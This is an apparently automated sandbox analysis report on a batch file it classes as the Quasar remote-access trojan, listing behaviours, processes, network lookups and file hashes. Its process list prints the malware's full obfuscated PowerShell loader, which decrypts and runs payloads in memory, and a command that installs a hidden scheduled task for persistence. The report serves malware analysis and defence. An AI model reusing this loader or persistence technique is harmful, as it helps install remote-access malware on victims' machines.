Analysis Overview
SHA256
fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926
Threat Level: Known bad
The file API_Connector.bat was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Command and Scripting Interpreter: PowerShell
Looks up external IP address via web service
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Modifies registry class
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-10 14:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-10 14:58
Reported
2024-06-10 15:01
Platform
win11-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\API_Connector.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Local\Temp\API_Connector.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_57_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lfqvBn8hofubXSZmsKmV83W9/qxpo9rugEdXZEomQLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bUSTj74gvGgYEhrqOpYzuQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $IoSqq=New-Object System.IO.MemoryStream(,$param_var); $WqTdq=New-Object System.IO.MemoryStream; $NwpAs=New-Object System.IO.Compression.GZipStream($IoSqq, [IO.Compression.CompressionMode]::Decompress); $NwpAs.CopyTo($WqTdq); $NwpAs.Dispose(); $IoSqq.Dispose(); $WqTdq.Dispose(); $WqTdq.ToArray();}function execute_function($param_var,$param2_var){ $nzMDD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RfEIj=$nzMDD.EntryPoint; $RfEIj.Invoke($null, $param2_var);}$LVpLY = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat';$host.UI.RawUI.WindowTitle = $LVpLY;$UqrjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($LVpLY).Split([Environment]::NewLine);foreach ($uWetJ in $UqrjN) { if ($uWetJ.StartsWith('gXDGnOjJvtwCvUiJRmac')) { $KAIJT=$uWetJ.Substring(20); break; }}$payloads_var=[string[]]$KAIJT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | freegeoip.net | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| IE | 52.111.236.22:443 | tcp |
Files
memory/4012-0-0x00007FF991AE3000-0x00007FF991AE5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcsytksq.twb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4012-10-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/4012-9-0x0000023F97FF0000-0x0000023F98012000-memory.dmp
memory/4012-11-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/4012-12-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/4012-13-0x0000023FB05D0000-0x0000023FB0616000-memory.dmp
memory/4012-14-0x0000023FB0360000-0x0000023FB0368000-memory.dmp
memory/4012-15-0x0000023FB0620000-0x0000023FB0690000-memory.dmp
memory/880-17-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/880-18-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/880-27-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/880-30-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.vbs
| MD5 | 065cc72718daae804e5bea6753652a33 |
| SHA1 | 3243bf10760303cc68da17673be2d2bc9565b464 |
| SHA256 | a49fed4eedf27903821b907776260c8567fd1de66c84689a53a4b55484c87cb7 |
| SHA512 | c237f5d45c75b687fd4dc737617f278639f88671893613e077778cc9210ee0521f17d61c12216c9bfc39de3510241ad33755ff64fa5b37813971225126086326 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_57.bat
| MD5 | 54b83bd573c13cd414255d487f47b770 |
| SHA1 | f35b29215c9039af7294b1e9db7977447f380cbe |
| SHA256 | fae3ed9b66f0e1fc27bdd6605dd3fd0600ff4291971d850f61cd0696c4ed9926 |
| SHA512 | 8c607148b7e001d5ea9efb048cebf3fc78238f333cc09c368078f77b0d0fcf4ac22a5594bd7417515ee4ea73e7943fb1e47232e9caac6e3e74caa3313c89f6d9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |
memory/3200-47-0x00000000063A0000-0x00000000063CA000-memory.dmp
memory/4012-95-0x00007FF991AE0000-0x00007FF9925A2000-memory.dmp
memory/3200-96-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1252-103-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1196-108-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1352-107-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1124-111-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/932-110-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/3376-109-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1560-105-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1948-104-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/2532-102-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1652-101-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/1296-100-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/2284-99-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/3404-98-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/3720-106-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/2844-97-0x00007FF972AD0000-0x00007FF972AE0000-memory.dmp
memory/3348-144-0x0000027A6A0A0000-0x0000027A6A0FE000-memory.dmp
memory/3348-145-0x0000027A6A130000-0x0000027A6A142000-memory.dmp